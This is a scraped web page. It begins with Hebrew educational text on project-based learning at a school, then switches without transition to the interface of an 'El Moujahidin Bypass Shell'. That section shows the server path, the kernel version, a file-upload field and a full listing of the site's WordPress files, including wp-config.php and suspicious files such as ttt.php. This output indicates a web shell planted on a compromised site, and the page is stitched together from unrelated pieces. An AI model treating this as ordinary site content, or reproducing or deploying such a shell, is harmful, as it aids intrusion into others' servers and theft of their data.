למידה משולבת פרויקטים

למידה משולבת פרויקטים היא דגם יישומי למימושה של למידה מיטבית. זוהי אסטרטגיה המכירה בכך שלמידה משמעותית מעוררת בקרב התלמידים את הנעתם הפנימית.  היא מוכוונת לומד, מושתתת על מעורבות בתהליך הלמידה ועל הבנה בתוצר.

במרכז הלמידה – משימה אותנטית, מורכבת, שנובעת משאלה מאתגרת המובילה את הלומדים למפגש עם הרעיונות המרכזיים או העקרונות של תחום הדעת שבו מתמקדת הלמידה; היא  דורשת חקירה, אינטראקציה עם לומדים ועם מקורות מידע מגוונים; היא מלווה בהנחיה סדירה של המורה בסביבת למידה פיזית ובסביבת למידה מתוקשבת במערכת ריאלידע, ובמהלכה נבנים ומיושמים ידע, הבנה וכישורים.

למידה משולבת פרויקטים היא מהלך התפתחותי – רצף של אבני דרך שלאורכו מתפתחים במשולב שלושה מרכיבים:

  • פרויקט – מהלך של עבודה מאומצת על מטלה ארוכת טווח המכוונת ליצירה של תוצר מוגמר כבעל ערך ללומד ולקהל יעד. הפרויקט נותן ביטוי לכישורים רלוונטיים ולהבנה של ידע אקדמי מורכב.
  • יחידת לימוד – בנייה של גוף ידע משמעותי בתחום הדעת.
  • הצגה של למידה – מעמד שבו מציג הלומד תוצר חלקי או מוגמר לשיפוט קהל היעד/הידע הרלוונטי ומשתף אותו בתהליכי היצירה והלמידה שהובילו להפקת התוצר.

המסגרות הארגוניות של בית הספר מכוונות כולן כדי לתמוך בדרך למידה זו ומהוות תשתית עבורה.

El Moujahidin Bypass Shell

Current Path : /home/reali/public_html/

Linux danreali 3.13.0-68-generic #111-Ubuntu SMP Fri Nov 6 18:17:06 UTC 2015 x86_64
Upload File :

Name
Size
Permissions
Options
.usermin
--
drwx------
biram-courses-2017
--
drwxr-xr-x
booklet
--
drwxr-xr-x
invention
--
drwxr-xr-x
maps
--
drwxr-xr-x
meydaon-biram
--
drwxr-xr-x
org
--
drwxr-xr-x
phpmyadmin
--
drwxr-xr-x
reali-100
--
drwxr-xr-x
reg
--
drwxr-xr-x
shapira
--
drwxr-xr-x
shapira-2014
--
drwxr-xr-x
truma
--
drwxr-xr-x
wp-admin
--
drwxr-xr-x
wp-content
--
drwxr-xr-x
wp-includes
--
drwxr-xr-x
.htaccess
0.678 KB
-rw-r--r--
google3b31a5353cb3d20d.html
0.052 KB
-rw-r--r--
index.php
0.408 KB
-rw-r--r--
license.txt
19.468 KB
-rw-r--r--
readme.html
7.259 KB
-rw-r--r--
ttt.php
0.067 KB
-rw-r--r--
wp-activate.php
5.319 KB
-rw-r--r--
wp-blog-header.php
0.355 KB
-rw-r--r--
wp-class.php
25.106 KB
-rw-r--r--
wp-comments-post.php
1.589 KB
-rw-r--r--
wp-config-sample.php
2.786 KB
-rw-r--r--
wp-config.php
3.874 KB
-rw-r--r--
wp-cron.php
3.209 KB
-rw-r--r--
wp-links-opml.php
2.365 KB
-rw-r--r--
wp-load.php
3.224 KB
-rw-r--r--
wp-login.php
33.144 KB
-rw-r--r--
wp-mail.php
7.859 KB
-rw-r--r--
wp-settings.php
15.874 KB
-rw-r--r--
wp-signup.php
29.195 KB
-rw-r--r--
wp-trackback.php
4.407 KB
-rw-r--r--
xmlrpc.php
2.993 KB
-rw-r--r--

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: [email protected]